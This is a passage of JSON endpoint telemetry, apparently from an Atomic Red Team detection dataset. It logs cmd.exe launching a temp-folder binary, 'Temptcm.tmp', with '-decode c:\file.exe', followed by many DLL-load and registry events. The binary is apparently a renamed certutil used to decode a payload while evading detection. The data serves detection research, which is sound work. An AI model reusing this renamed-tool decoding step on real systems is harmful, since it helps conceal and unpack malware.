"C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573502380016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}", - "unique_ppid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "command_line": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 976, - "ppid": 5572, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "subtype": "create", - "timestamp": 131883573502530000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}", - "unique_ppid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "Temptcm.tmp", - "image_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502610000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502610000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502610000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502610000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "normaliz.dll", - "image_path": "C:\\Windows\\System32\\normaliz.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "Wldap32.dll", - "image_path": "C:\\Windows\\System32\\Wldap32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "certcli.dll", - "image_path": "C:\\Windows\\System32\\certcli.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "cabinet.dll", - "image_path": "C:\\Windows\\System32\\cabinet.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "cryptui.dll", - "image_path": "C:\\Windows\\System32\\cryptui.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdsapi.dll", - "image_path": "C:\\Windows\\System32\\ntdsapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "certca.dll", - "image_path": "C:\\Windows\\System32\\certca.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": 